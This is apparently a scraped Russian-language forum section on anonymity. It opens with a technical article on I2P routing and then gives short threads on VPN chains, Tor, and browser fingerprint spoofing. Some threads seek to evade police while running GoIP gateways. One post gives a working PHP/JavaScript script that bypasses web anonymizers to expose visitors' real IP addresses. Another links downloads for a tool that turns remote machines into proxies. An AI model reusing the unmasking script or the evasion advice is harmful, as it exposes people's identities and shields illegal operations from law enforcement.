SHA256 для вычисления хэшей
Adler32 для вычисления контрольной суммы сообщений

Основные протоколы

I2P сеть состоит из 4-х основных уровней:
Транспортный уровень. Это зашифрованные Интернет соединения TCP/IP или UDP. Включает в себя установку соединений и шифрование.
Тоннели. «Окна» узлов во внешний мир, располагающиеся на других узлах и позволяющие скрывать свое истинное местоположение. Состоят из последовательности узлов, соединенных между собой протоколами транспортного уровня. Тоннель можно упрощенно представлять себе как цепочку прокси-серверов для анонимизации как клиента так и сервера.
«Чеснок». Передача сообщений или последовательности между двумя конечными узлами произвольным маршрутом и тоннелями. Характеризуется идентификаторами сессий и асссиметричным, а, после установки сессии, симметричным шифрованием
Протоколы прикладного уровня для передачи пользовательских данных между узлами.

Каждый уровень добавляет свое собственное шифрование разного назначения. Шифрование транспортного уровня скрывает трафик от провайдера, туннелей — содержимое и направление от промежуточных узлов туннелей, «чеснок» — от конечных узлов тоннелей при передаче сообщений между тоннелями.

Транспортный уровень

Для того чтобы установить соединение транспортного уровня требуется знать IP адрес и порт. Существует список известных узлов, называемый netDb, изменяющийся в процессе работе, информация о новых узлах поступает от других узлов. Первоначально список узлов скачивается со специальных сайтов, адреса которых явно перечислены в файле router/networkdb/Reseeder.java. Протокол, работающий поверх TCP/IP называетcя NTCP, а поверх UDP — SSU. Помимо некоторых отличий в установке соединений, SSU из-за пакетной природы поддерживает разбивку длинных сообщений на несколько фрагментов. Передаваемые сообщения состоят из заголовка, I2PN сообщения (о протоколе I2NP ниже) и контрольной суммы. Периодически передается специальное сообщение, содержащее текущее время с целью синхронизации. При установке соединения происходит обмен публичными ключами маршутизаторов, на основе которых по алгоритму Диффи-Хельмана вычисляется общий ключ для AES шифрования каждый на своей стороне.

Тоннели

Тоннели всегда однонаправленные — все сообщения могут передаваться только от входного узла (Gateway) к выходному узлу (Endpoint). В зависимости от того какой конец тоннеля принадлежит его владельцу, обладающему всей полнотой информации о тоннеле, тоннели делятся на входящие (владелец — выходной узел) и исходящие (владелец — входной узел). Промежуточным узлам тоннеля неизвестно, является ли тоннель входящим или исходящим, единственное действие, осуществляемое промежуточным узлом, это шифрование сообщения своим ключом шифрования и передача следующему узлу. Отсюда вытекает важное следствие: последовательное расшифрование сообщений тоннеля должно осуществляться его владельцем, поскольку только у владельца есть ключи шифрования всех промежуточных узлов. Данный факт достаточно тривиален для входящих тоннелей, т. е. получив сообщение выходной узел должен его последовательно расшифровать, однако для исходящих тоннелей оригинальное незашифрованное сообщение должно быть последовательно расшифровано перед его отправкой. Тоннели, для которых данный узел не является владельцем, называются транзитными. Транзитные тоннели передают чужой трафик и необходимы для поддержки функционирования всей сети I2P, тем самым превращая узел в маршутизатор. Узлы тоннелей используют AES шифрование с тремя различными ключами: один используется для шифрования ответа узла при создании тоннеля, а два других для передачи данных через тоннель: один ключ шифрует сами данные, а другой шифрует вектор ипициализации (IV) для шифрования данных. При этом IV шифруется тем же самым ключом дважды: до шифрования и после, называется это двойным шифрованием (double encryption). Узел получает эти два ключа в относящейся к нему записи сообщения создания тоннеля, зашифрованной его публичным ключом с помощью Эль-Гамаля.
Внутри тоннелей передаются исключительно сообщения TunnelData, вообще говоря состоящие из нескольких фрагментов. Для передачи между тоннелями используется сообщение TunnelGateway. Хотя в официальной документации написано, что для двустороннего соединения необходимо как минимум 4 тоннеля (2 входящих и 2 исходящих), на самом деле передавать сообщения через исходящие тоннели необязательно, а можно отправить сообщение TunnelGateway входному узлу нужного входяшего тоннеля.
В сообщении TunnelData контрольная сумма вычисляется из содержательных данных, следующих за нулевым байтом и присоединённым к нему не зашифрованным IV.

Протокол I2NP

Обмен данными внутри сети I2P происходит с помощью I2NP сообщений разных типов. Каждое сообщение содержит заголовок с его типом и длиной, позволяющий определить границы между сообщениями. В зависимости от типа длина сообщения может варьироваться от 20 до 64К байт. Каждый уровень использует сообщения- «обертки», содержащие внутри себя другие I2NP сообщения более высокого уровня. Для тоннелей такими «обертками» являются сообщения TunnelData для передачи внутри тоннелей и TunnelGateway для передачи между тоннелями. Для «чеснока» — Garlic. Большую часть I2P трафика представляют собой следующий вложенные сообщения:
Data->Garlic->TunnelData.
Как правило сообщения передаются через тоннели, хотя могут передаваться и напрямую между маршутизаторами, в частности для первоначального создания новых тоннелей. Также маршутизаторы обмениваются сообщениями DatabaseStore сразу после установки соединения. Сообщения между точками назначения следует передавать через «чеснок», поскольку соответствующее поле присутствует только там.

Маршутизаторы и точки назначения (destinations)

Для работы в сети I2P необходим I2P клиент, состоящий из маршутизатора, обеспечивающего доступ в сеть I2P, и точек назначения для обмена содержательной информацией. Информация о маршутизаторах в том числе и об их IP адресах является общедоступной, более того, актуальный список маршутизаторов можно скачать со специальных ftp-сайтов. В то же время информация о местоположении точек назначения является конфиденциальной. Информацией о точках назаначения, расположенном на данном маршутизаторе, располагает только данный маршутизатор, для все остальных получение этой информации не представляется возможным, что является одним из основных механизмов обеспечения анонимности сети I2P.
Поскольку маршутизаторы в основном располагаются на компьютерах участников сети, то их состав все время изменяется. Поэтому маршутизаторы вынужденны постоянно поддерживать свой список другим маршутизаторов в актуальном состоянии. Этот процесс называется «зондированием» (exploratory), заключающийся в посылке запросов со случайно выбранным 32-байтным адресом специальным маршутизаторам, называемых floodfill. Предполагается что floodfill-маршутизаторы обладают всей полнотой информации о сети. Помимо все прочего floodfill-маршутизаторы постоянно сообщают друг другу информацию о найденных новых узлах.
Для запроса информации об узле используются I2NP сообщение DatabaseLookup, а для передачи самой ифмации DatabaseStore. Как правило сообщения передаются через тоннели, однако DatabaseStore передается узлом напрямую на траспортном уровне сразу после установки соединения, тем сам сообщая сети о своем существовании. В противном случае построение тоннелей для новых узлов было бы невозможно.
DatabaseStore может содержать информацию двух видов, в случае если данному адресу соотвествуют структура RouterInfo, то адрес является маршутизатором, а если LeaseSet то точкой назначения.
RouterInfo содержит публичные ключи маршутизатора, а также разнообразную служебную информацию, наиболее важной из которой являются IP адреса, порты и поддерживаемые транспортные протоколы для соединения и сведения о том является ли даныый маршутизатор floodfill-ом или нет. Поскольку RouterInfo может содержать довольно много текстовой информации, то передается заархивированным gzip-ом.
LeaseSet, содержит список входящих туннелей данной точки назначения, а также публичный ключ для шифрования «чесночных» сообщений, предназначенной данной точке назначения.

Службы прикладного уровня

Рассмотрим содержательные действия I2P клиента: анонимный хостинг онлайн ресурсов, и, соответственно, доступ к ним. Для начала попробуем получить данные с некоторого веб-сайта, например, Флибусты. На данный момент у нас имеется только 32-байтный хэш ее I2P адреса, нашей целью же является отправка HTTP-запроса, и получение ответа.
Разумеется маршутизатор с таким адресом в базе отсутствует (иначе IP адрес ресурса был бы виден всем), поэтому единственный способ отправить запрос — это какой-нибудь входящий тоннель нужного узла, существующий в данный момент времени, для чего сначала следует запросить и получить LeaseSet. В отличие от RouterInfo, который можно запросить и получить с соседнего узла на транспортном уровне, LeaseSet можно запросить и получить только через туннели, которые предварительно нужно построить. Отсюда следует неутешительный вывод, что использовать I2P сеть «по требованию» не получится, I2P маршутизатор должен быть запущен и должен постоянно заниматься построением и поддержкой тоннелей. Из-за децентрализованности сети построение тоннелей весьма непростое дело — большинство попыток создания тоннелей оканчиваются неуспехом.
Для успешного построения тоннеля необходимо два условия:
Все участвующие в тоннеле узлы должны быть доступны на транспортном уровне по крайней мере предыдущему узлу в тоннеле
Все участвующие в тоннеле узлы должны быть согласны построить новый тоннель. Узел может отказать в создании тоннеля, например, в силу его загруженности

Максимальное время жизни тоннеля 10 минут, тоннель может прекратить свое существование и досрочно, если участвующий в тоннеле узел ушел в оффлайн. Поэтому владельцы тоннелей постоянно посылают тестовые сообщения чтобы поддерживать список «живых» тоннелей в актуальном состоянии.
Итак, тоннели имеются в наличии и необходимый LeaseSet имеется в наличии. Теперь можно отправить HTTP запрос и он даже достигнет адресата, однако нам желательно также и получить ответ. Для этого мы в нашем сообщение должны указать наш собственный LeaseSet, тогда ответ будет отправлен нам через какой нибудь входящий туннель и скорее всего благополучно достигнут нашего узла. Поскольку через наш узел может одновременно работать несколько соединений, то каждому из них должен быть либо назначен собственный I2P адрес и сформирован LeaseSet из нескольких входящих туннелей, либо создан «разделяемый» адрес, мультиплексирующий соединения, используя специальный протокол соответствующими полями, являющийся «оберткой» над протоколом прикладного уровня. Такой протокол называется I2CP и в официальном I2P клиента используется исколючительно он, хотя для построения собственных служб это необязательно. Разумеется для доступа к Флибусте следует использовать I2CP, посколько она ожидает именно его. Однако для построения к примеру собственной торрентоподобной сети можно обойтись только I2P адресацией.

Добавлено в [time]1387304248[/time]
В предыдущей статье были рассмотрены задачи, необходимые для построения I2P маршутизатора, способного принимать участие в работе сети, включающие взаимодействие с другими маршутизаторами через обычный Интернет, построение тоннелей разных видов и сбор информации о других узлах сети. Несмотря на важность этих задач, I2P клиент, выполняющий лишь функции маршутизатора, с точки зрения пользователя является «вещью в себе», поскольку не делает ничего интересного пользователю. Данная статья посвящена протоколам прикладного уровня, предназначенных для передачи пользовательских данных через сеть I2P.

Если вопросы работы I2P маршутизатора более или менее логично освящены в официальной документации, то прикладные протоколы представляют собой мешанину различных идей, сводящихся к тому, что каждый волен реализовать собственный протокол для собственного приложения, используя точки назначения в качестве адресов. Однако это нисколько не приближает к реализации собственного клиента, поскольку существующие ресурсы сети уже используют какие то протоколы и всякая новая реализация должна уметь с ними работать. В качестве примера можно посмотреть описание «чеснока», из данной страницы реально лишь понять, как следует упаковывать «чесночины» и как шифровать. Что передается между Алисой и Бобом, а также откуда Боб знает, что ответ следует отправлять именно Алисе, совершенно непонятно. Там же содержится утверждение, что с целью подтверждения доставки в одной из «чесночин» передается сообщение DeliveryStatus с указанием маршутизатора-отправителя в инструкциях для доставки, тем самым раскрывая маршутизатор, на котором сидит отправитель. Разумеется это не так. К сожалению, единственным способом узнать, как обстоят дела на самом деле, был анализ трафика, генерируемого официальным джава-клиентом.

«Чесночная» передача данных

Разберемся в этом вопросе более подробно, несколько видоизменив оригинальный пример и сделав его более практическим. Предположим что Вася Пупкин обращается к сайту Флибусты, который отныне доступен только по I2P, в то же время у Васи есть собственный сайт, оскорбляющий чьи-нибудь чувства, потому и находящийся в I2P. Для этого у Васи запущен маршутизатор, постоянно поддерживающий как минимум один исходящий и один входящий тоннели. Для своего сайта Вася создал отдельную точку назначения и опубликовал везде ее адрес. Для обращения к Флибусте ее адрес Вася уже знает, и его маршутизатор знает ее LeaseSet и может отправить туда сообщение, проблема заключается лишь в том что Васе нужно получить ответ от Флибусты, а для этого ей нужно знать адрес Васи. С этой целью на васином маршутизаторе создается еще одна точка назначения, служащая в качестве обратного адреса для все соединений, инициируемых Васей. Не только для Флибусты, но и всех остальных сайтов. При необходимости можно создать и несколько таких обратных адресов, но тогда также придется строить LeaseSet-ы с разными непересекающимися наборам тоннелей.

Для передачи данных между точками назначения используется I2NP сообщение Garlic — «чеснок». Сами сообщения передаются и шифруются между маршутизаторами, используя для этого отдельную пару ключей шифрования, публичный ключ которой передается в LeaseSet-е. Этот ключ не совпадает с публичным ключом маршутизатора, и в отличие от последнего, генерируется по новой при каждом старте. Внутри сообщение состоит из «чесночин», каждая из которых состоит из I2NP сообщения и инструкций для его доставки (delivery instructions) 4-х видов:
Локальный. Сообщение предназначено самому маршутизатору. Как правило чей-то LeaseSet.
Точка назначения. Сообщение предназначено точке назначения, подключенной к маршутизатора. Является единственным способом отправки данных точке назначения.
Тоннель. Сообщение предназначено для отправки в указанный входящий тоннель, начинающийся на указанном маршутизаторе. Используется для подтверждения доставки «чеснока».
Маршутизатор. Сообщение предназначено для отправки другому маршутизатору. Черезвычайно опасно с точки зрения безопасности, если указанный маршутизатор отличен от собственного или пользующегося доверием. На практике не встречалось.

Как правило используются «чесноки», состоящие из двух «чесночин». Первой является I2NP сообщение DeliveryStatus с номером сообщения самого «чеснока» и доставкой в один из входяших тоннелей маршутизатора отправителя. Используется для подтверждения доставки всего «чеснока» по назначению. Второй является I2NP сообщение Data, содержащее сами передаваемые данные с доставкой в точку назначения. Иногда присутствует и третья «чесночина» — LeaseSet точки назначения (не маршутизатора) отправителя. В нашем примере это LeaseSet обратного адреса Васи. Такая «чесночина» присутствует в двух случаях: в самом первом сообщении и при изменении LeaseSet-а. Делается это для того чтобы маршутизатор знал каким образом отослать ответ отправителю, иначе пришлось бы запрашивать соответствующий LeaseSet у floodfill маршутизаторов, который скорее всего там будет отсутствовать, как, например, обратный адрес Васи, а LeaseSet секретного сайта Васи наоборот там будет присутствовать.
Возникает вопрос, откуда Флибуста знает, что ответ следует отправить именно Васе, а не Петей или еще кому нибудь из обращающихся к ней в тот же самый момент. Даже если бы было известно, что «чеснок» пришел от маршутизатора Васи, чего, конечно же, не имеет место быть, то это бы помогло не сильно, поскольку на маршутизаторе Васи помимо обратного адреса имеется также его сайт и, возможно, еще много чего. Оказывается, данная информация должна содержаться внутри передаваемых в сообщении Data данных, что свидетельствует о неудачном дизайне всей системы, поскольку не позволяет достичь изоляции протоколов разных уровней друг от друга. Иначе говоря, адрес точки назначения должен присутствовать одновременно как в самих данных так и в протоколе для передачи этих данных.

Данные протокола I2CP

Изначально протокол I2CP разрабатывался исключительно для обмена между различными приложениями и маршутизатором — его сообщения в саму сеть I2P попадать не должны. Однако содержимое сообщений SendMessageMessage и MessagePayloadMessage передается по сети внутри I2NP сообщений Data, и представляют собой архивированные gzip-ом данные со специальным образом измененным заголовком вида.

0x1F 0x8B 0x08 — префикс gzip-а
1 байт флагов gzip-а
2 байта TCP или UDP порт отправителя
2 байта TCP или UDP порт получателя
1 байт дополнительных флагов gzip-а
1 байт типа протокола: 6 — потоковый (streaming), 17 — дейтаграммный (datagram), 18 — «сырой» (raw)

Таким образом каждое сообщение Data, переданное через «чеснок» всегда будет начинаться с 0x1F 0x8B 0x08 и первым делом распаковывается gzip и, в зависимости от типа протокола, обрабатывается соответствующей реализацией.

Потоковый протокол (streaming)

Потоковый протокол аналогичен TCP протоколу и гарантирует последовательность передачи данных. Сообщения состоят из заголовка и собственно данных. Тип сообщения определяется полем флагов, аналогично TCP имеются флаги SYN/FIN для установки и разрыва соединения. В отличие от TCP также могут присутствовать вплоть до 255 NACK-ов — номеров пропущенных сообщений с требованием переслать их повторно, что более характерно для пакетных протоколов и требует более сложной реализации. Также содержатся стандартные для TCP поля: 4-х байтные порты отправителя и получателя, называемые потоками, номера последовательности и номера подверждения.
При установке соединения происходит обмен сообщениями с установленным флагом SYNCHRONIZE, при этом обязательно должны быть установлены флаги FROM_INCLUDED и SIGNATURE_INCLUDED. Первый означает что в заголовке присутствует полный 387-байтный I2P адрес, а второй, что все сообщение подписано закрытым ключом I2P адреса отправителя. Таким образом стороны узнают I2P адреса друг друга, а проверка подписи гарантирует, что эти адреса настоящие. Иначе говоря, Вася, подключаясь к адресу Флибусты, после установки соединения может быть уверен, что это именно Флибуста, а Флибуста узнает обратный адрес Васи.
Таким образом, интерфейс потоковых протоколов может быть реализован в виде обычных сокетов, что позволяет использование I2P в сетевых приложениях с минимальными изменениями.

Источник:http://m.habrahabr.ru/post/206160/

VOIP трафик, анонимность.

ID: 676533bbb4103b69df371dab
Thread ID: 24747
Created: 2013-10-24T23:14:29+0000
Last Post: 2013-10-24T23:14:29+0000
Author: AMoney
Replies: 0 Views: 1K

Всем привет, заинтересовала тема продажи воип трафика через goip, вопрос такой в принципе только интересует так как оборудование приходится где то ставить самому и заряжать симками, как лучше скрыть все это дело? Ну впн понятно, ну а на хорошем уровне скажем ДЛЯ ПРИМЕРА - включил goip шлюз дома, ну и кроме как впн как еще можно скрыть себя от полиции?))).
Пример дома, потому что хочу надежно защитить места где будет оборудование. Про оформление инета на левого человека и снимать квартиру я знаю ну а все же по вариантам ребята что есть? или может какие то дельные советы еще в этой области.

Как правильно настроить связку vpn+socks?

ID: 676533bbb4103b69df371dad
Thread ID: 24712
Created: 2013-10-12T20:03:25+0000
Last Post: 2013-10-15T19:23:22+0000
Author: Аврам
Replies: 3 Views: 1K

Добрый день! Пользуюсь одним из сервисов vpn скрывает мой ip. А как еще поверх одеть socks. Самое главное, что бы трафик шел по цепочке мой ip - vpn - сокс. Или просто нужно вбить прокси в браузер, в настройках?

Детект и Обход анонимайзера

ID: 676533bbb4103b69df371db0
Thread ID: 24524
Created: 2013-08-09T21:17:15+0000
Last Post: 2013-08-10T03:44:48+0000
Author: malayazemlya
Replies: 1 Views: 1K

Набросал скриптец, обходящий анонимайзеры по типу SPOILERmyass.com, SPOILERme.ru итп. и выводящий реальный ип пользователя. Вполне вероятно, что метод уже известен, ибо программисты там явно академиев не заканчивали :pioneer:

Code:Copy to clipboard

<?php // Абсолютный URL указывающий на эту же страницу $next_stage_uri = "http://www.oursite.com/script.php?s=1"; // For CloudFlare $_SERVER["REMOTE_ADDR"] = isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER["REMOTE_ADDR"]; $stage = @$_GET['s']; function encodeJsStr($str) { return preg_replace_callback('/[^\w]/', function($match) { $code = ord($match[0]); if ($code <=255) { return sprintf('\x%02x', $code); } else { return sprintf('\u%04x', $code); } return $ch; }, $str); } $ip_str = htmlentities($_SERVER["REMOTE_ADDR"]); // красивости. не обязательны $css = <<<CSS body{width:100%;position:fixed;bottom:0;top:0;text-align:center;margin:0;padding:0} .stage1 #userip{font-size:24px} .stage1 #userip{font-size:48px} .stage0 strong{color:red} .stage1 strong{color:green} iframe#ifr{width:600px;height:200px;margin:0 auto} .centered{text-align:center;margin:0 auto} CSS; if (!$stage) { // собственно обход. //главный момент это атрибут formaction $iframe_html =<<<HTML <body> <form id="frm" action="/" method="post" style="visibility:hidden"> <input name="q" type= "submit" value='ok' formaction="$next_stage_uri"> </form> </body> HTML; $iframe_html_js = encodeJsStr($iframe_html); $page_js = <<<JS window.onload = function() { // детект переписывания страницы анонимайзером function detect() { var cont = this['document'].getElementById('container'); var cnext = cont.nextSibling; while (cnext && cnext.nodeType != 1) { cnext = cnext.nextSibling; } var cprev = cont.previousSibling; while (cprev && cprev.nodeType != 1) { cprev = cprev.previousSibling; } var cparent = cont.parentNode; return cparent != document.body || cnext || cprev; } if (detect()) { alert("Embedding detected"); } // создаем айфрейм который будет работать в обход анонимайзера var iframe = this['document']['createElement']('iframe'); iframe.id = "ifr"; iframe.frameBorder = "0"; iframe.klass = "centered"; this['document']['body']['appendChild'](iframe); var doc = iframe['contentWindow']['document']; doc['open'].call(doc); doc['write'].call(doc,'$iframe_html_js'); doc['close'].call(doc); doc.forms[0].q.click(); } JS; echo <<<HTML <html> <style> $css </style> <script> $page_js </script> <body class="centered stage0"><div id="container"> <div id="userip"> Your apparent ip is <strong>$ip_str</strong> </div> </div></body> </html> HTML; } else if ($stage == '1') { echo <<<HTML <style> $css </style> <body class="centered stage1"><div id="container"> <div id="userip"> Your direct ip is <strong>$ip_str</strong> </div> </div></body> HTML; } ?>

Проверено на
http://SPOILERmyass.com/
http://SPOILERme.ru/
http://online-anonymizer.com/ (если включены скрипты)
https://simple-proxy.com/

PS:если это неправильный раздел, прошу старших товарищей меня поправить

VPNLab.ru service

ID: 676533bbb4103b69df371db2
Thread ID: 24398
Created: 2013-07-10T16:04:44+0000
Last Post: 2013-07-10T16:04:44+0000
Author: socalow
Replies: 0 Views: 1K

did anyone is using this service? any feedback?
Кто-нибудь использует эту службу? любую обратную связь?

Firewall Tunnel

ID: 676533bbb4103b69df371db3
Thread ID: 23815
Created: 2013-01-24T18:27:39+0000
Last Post: 2013-06-04T14:40:37+0000
Author: Wolfomeo
Replies: 1 Views: 1K

Два года назад, на ачате видел тему, где один мембер выкладывал одну интересную утилиту, которая позволяла с любого дедика/пк, делать прокси- сервер. Тогда я ей не придал надлежащего значения. Нынче вспомнил, спохватился, а ни темы, ни воспоминаний о названии - нету, нашел с трудом ^_^

ft_fe.exe - нужно запускать на машине с внешним IP (сервер).
ft_be.exe - нужно запускать на ПК за NAT.
Работает как Socks4. Для работы нужно таскать за собой cygwin1.dll

Click to expand...

Скачать: http://rghost.ru/43285547
Зеркало: http://www.sendspace.com/file/bybx7o

TOR & SSL

ID: 676533bbb4103b69df371db6
Thread ID: 23673
Created: 2012-12-21T09:53:26+0000
Last Post: 2013-01-09T18:51:25+0000
Author: ac1dr4in
Replies: 8 Views: 1K

Здравствуйте. Смогут ли отснифать пароли/прочую важную инфу на exit-ноде тора, если к сайту буду подключаться по https?

три джи question

ID: 676533bbb4103b69df371db7
Thread ID: 23613
Created: 2012-12-02T17:24:38+0000
Last Post: 2012-12-03T15:02:47+0000
Author: demien
Replies: 4 Views: 1K

Spoiler: 100

Ребят может кто в курсе...
Переделываю 3g модем мегафоновский E352 под внешнюю антенну, как описанно в статье с хабра (http://habrahabr.ru/post/137911/). Меня интересует не столько увеличение скорости, сколько андетект моей локации. Где-то вычитал что оператор сот. связи может вычислить текущее метоположение с точностью до 10 метров без внешней антенны. Писали также, что если работать через антенну в центре трех ретрансляторов, то задетектить местоположение становится гораздо труднее... Возможно есть какие-нибудь рассеиватели в конечной точке?
А также лучше "работать" с такой антенной из одного фиксированного места, либо мобилизировать весь процесс меняя каждый раз места?

Вообщем интересует проверенная инфа на эту тему, а точнее риски, факты етц.

Создаем безопасный чат для общения в команде.

ID: 676533bbb4103b69df371ace
Thread ID: 69938
Created: 2022-07-11T06:21:10+0000
Last Post: 2022-08-23T08:45:29+0000
Author: peacemaker
Prefix: Мануал/Книга
Replies: 1 Views: 998

Все вы наверное видели, что все крупные команды используют закрытые чаты типа Rocket, Mattermost и другие. Я вам расскажу как сделать такой чат в торе. И настроить его безопасно.

Для начала покупаем VPS. Рекомендованные характеристики. 2 ядра, 4 гигабайта оперативки. Желательно Ubuntu версия 20 и выше.

[ Installing Mattermost Server — Mattermost documentation

](https://docs.mattermost.com/install/install-rhel-8-mattermost.html)

![docs.mattermost.com](/proxy.php?image=https%3A%2F%2Fdocs.mattermost.com%2Finstall%2Finstall- rhel-8-mattermost.html%2F..%2F_static%2Ffavicon.ico&hash=777659f10eedf7d82e3ee1fe64f6f48d&return_error=1) docs.mattermost.com

Так же устанавливаем nginx

apt install nginx-full fail2ban tor

Удаляем стандартный конфиг из /etc/nginx/sites-enabled

Создаем файл конфигурации
sudo touch /etc/nginx/sites-available/mattermost

upstream backend {
server 127.0.0.1:8065;
keepalive 32;
}

proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=mattermost_cache:10m max_size=3g inactive=120m use_temp_path=off;

server {
listen 80 default_server;

location ~ /api/v[0-9]+/(users/)?websocket$ {
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
client_max_body_size 50M;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_buffers 256 16k;
proxy_buffer_size 16k;
client_body_timeout 60;
send_timeout 300;
lingering_timeout 5;
proxy_connect_timeout 90;
proxy_send_timeout 300;
proxy_read_timeout 90s;
proxy_http_version 1.1;
proxy_pass http://backend;
}

location / {
client_max_body_size 50M;
proxy_set_header Connection "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Frame-Options SAMEORIGIN;
proxy_buffers 256 16k;
proxy_buffer_size 16k;
proxy_read_timeout 600s;
proxy_cache mattermost_cache;
proxy_cache_revalidate on;
proxy_cache_min_uses 2;
proxy_cache_use_stale timeout;
proxy_cache_lock on;
proxy_http_version 1.1;
proxy_pass http://backend;
}
}

Click to expand...

Делаем перезапуск
/etc/init.d/nginx restart

Посмотреть документацию можно тут

[ Configure NGINX as a proxy for Mattermost server — Mattermost

documentation ](https://docs.mattermost.com/install/config-proxy-nginx.html)

![docs.mattermost.com](/proxy.php?image=https%3A%2F%2Fdocs.mattermost.com%2Finstall%2Fconfig- proxy- nginx.html%2F..%2F_static%2Ffavicon.ico&hash=2f38a673c7361a1cb6c497b81f55e935&return_error=1) docs.mattermost.com

После установки правим файл /etc/tor/torrc

HiddenServiceDir /opt/tor # путь к закрытому ключу
HiddenServicePort 80 127.0.0.1:80

Click to expand...

Создаем папку
mkdir /opt/tor

И перезапускаем tor
/etc/init.d/tor restart

Все готово! Домен можно поглядеть в папке /opt/tor

Приятного и безопасного общения

Настройка Firefox для Анонимности

ID: 676533bbb4103b69df371a08
Thread ID: 94356
Created: 2023-07-30T13:05:44+0000
Last Post: 2023-09-17T07:19:36+0000
Author: xBarny
Replies: 18 Views: 997

Филигранная настройка Firefox для большей анонимности в сети и сбора данных.
Информацию которую передеает ваш браузер когда вы заходите на разные сайты вы можете посмотреть тут - https://privacytool.org/AnonymityChecker/index.jsp
Что бы не скачивать лишние Аддоны ( которым лучше не доверять ), проще настроить несколько важных параметров

Открываем Браузер Firefox и в адрессной строке ( url вводим: about:config )

1. Изменияем версию браузера
Вводим - general.useragent.override
При изменении этого параметра есть нюанс. Некоторые сервисы могут воспринимать вас как ботов.
Поэтому забивайте правильные данные о другом браузере
Список разных UserAgent - тут <https://deviceatlas.com/blog/list-of-user- agent-strings#desktop>

2. Меняем определение реальной ОС на фейковую
general.platform.override
Тут можете ввести что угодно: Linux, Windows 11

3. Отключаем геолокацию
geo.enabled переводим в false
Отключение опредление firefox геолокации.

Или же более эстетичный метод, что бы было совсем все красиво это задать локацию страны и города где ваш vpn. К пример Швейцария -> Цюрих
Вводим - geo.provider.network.url - Вместо https://location.services.mozilla.com/v1/geolocate?key=%MOZILLA_API_KEY% вводим data:,{"location":{"lat":0.0,"lng":0.0},"accuracy":2000} - Где в нулях вводим координаты.
Подобрать координаты можно на сервисе https://www.latlong.net/

5. Отключаем WebRTC
Еще один фактор о котором надо беспокоиться это утечки данных через WebRTC - он используется для видео и аудиосвязи через браузер
Отключаем
media.peerconnection.enabled - выбираем false

---
Отключите сохранение истории, всех куков и поставьте privacy & security на максимальный уровень
Этого достаточно, что бы обеспечить максимальную аномность браузера.

Сравнение Антидетект-Браузеров

ID: 676533bbb4103b69df371994
Thread ID: 108511
Created: 2024-02-18T09:43:20+0000
Last Post: 2024-03-18T15:53:32+0000
Author: ЗубнойТехник
Replies: 10 Views: 987

Список самых ходовых и популярных браузеров.

секретный просмотр веб-страниц

ID: 676533bbb4103b69df371cbc
Thread ID: 39592
Created: 2020-07-14T00:37:48+0000
Last Post: 2020-07-20T07:35:44+0000
Author: vkad
Replies: 3 Views: 984

Я хочу использовать веб-сайты для загрузки программного обеспечения и данных, но веб-браузер работает медленно. какие-нибудь хорошие альтернативы TOR?

Подсказка от бывалых,или как всркыть своё недоверие гуглу

ID: 676533bbb4103b69df371c56
Thread ID: 46893
Created: 2021-01-17T10:17:39+0000
Last Post: 2021-01-19T19:25:49+0000
Author: NoNamePyth
Replies: 7 Views: 984

Всем привет
Не кидайтесь тапками под слова что ищи сам,или в гугле всё есть,ну не доверяю я ему.
Подскажите местечко где можно арендовать АНОНИМНЫЙ дедик
Буду очень благодарен любым наводкам

tor смена ip адресов

ID: 676533bbb4103b69df371c1d
Thread ID: 49502
Created: 2021-03-18T09:02:51+0000
Last Post: 2021-03-18T18:01:35+0000
Author: Jim0x
Replies: 6 Views: 981

Ребята, хотел бы у вас, а то есть у знающих людей уточнить инфу по поводу смены ip адресов tor'a то есть все мы знаем что там ipшки заезженные уже, можно их как то с дефолта менять на свои допустим вытащить с приватного vpn и засунуть в тор, а там уже через размещение тупо запустил тор, и у тебя рандомно гуляют айпишки?! Заранее спасибо

p.s. Гуляют в смысле меняются рандомно

Анонимная регистрация Гугл Андроид Девелопер

ID: 676533bbb4103b69df371c58
Thread ID: 46991
Created: 2021-01-19T15:35:04+0000
Last Post: 2021-01-19T18:48:13+0000
Author: user908768
Replies: 4 Views: 981

Собственно, сабж.
Необходимо зарегить аккаунт на андроид девелопера на гугле.
Принимаемая оплата только через кредитку.
Какие варианты имеются?

помогите с whonix

ID: 676533bbb4103b69df3718fc
Thread ID: 119486
Created: 2024-07-24T05:01:14+0000
Last Post: 2024-11-25T18:27:09+0000
Author: silero
Replies: 10 Views: 980

Всем привет! Хотел скачать Whonix и провести траффик Tor на Kali Linux.
Но при запуске Whonix он не подключается к tor и остаётся на 5%. Помогите пожалуйста.

Объединение нескольких VPS вместе

ID: 676533bbb4103b69df371b8a
Thread ID: 50759
Created: 2021-04-18T05:02:22+0000
Last Post: 2021-10-24T12:49:56+0000
Author: MR256
Replies: 5 Views: 976

Кто-нибудь связывает VPS вместе через VPN-туннель? Каждый VPS будет отличаться от провайдера и пользователя в случае взлома одного из них.

Как UDP трафик может проходить через Tor -> VPN цепочку? (ведь Tor не поддерживает UDP)

ID: 676533bbb4103b69df371c0a
Thread ID: 50600
Created: 2021-04-13T13:44:59+0000
Last Post: 2021-04-13T16:20:47+0000
Author: Vodoley
Replies: 2 Views: 960

Здравствуйте.
Сделал цепочку User -> Tor -> VPN -> Internet.
Tor - Whonix. VPN - тоже виртуалка, которая роутит трафик в Whonix.
Оказалось, каким то образом, UDP работает. Проверял с помощью команды rdate -u -p time.nist.gov. (-u флаг для UDP)
Проверил на двух одинаковых пустых ос. Одна пускает трафик только через тор, а другая через tor -> vpn. (TCP работает на обоих)
Та, что только через тор - UDP не работает. Та, что с впн - UDP работает.
Но ведь Tor не поддерживает UDP?
Как такое возможно? Трафик идет в обход Whonix? Утекает ли мой IP впн'у в таком случае?
В виртуалке с VPN udp не блокировал, полагал, Whonix его заблочит, но, видимо, нет.

911 socks + cyber police?

ID: 676533bbb4103b69df371d23
Thread ID: 32153
Created: 2019-09-30T20:55:40+0000
Last Post: 2019-09-30T20:55:40+0000
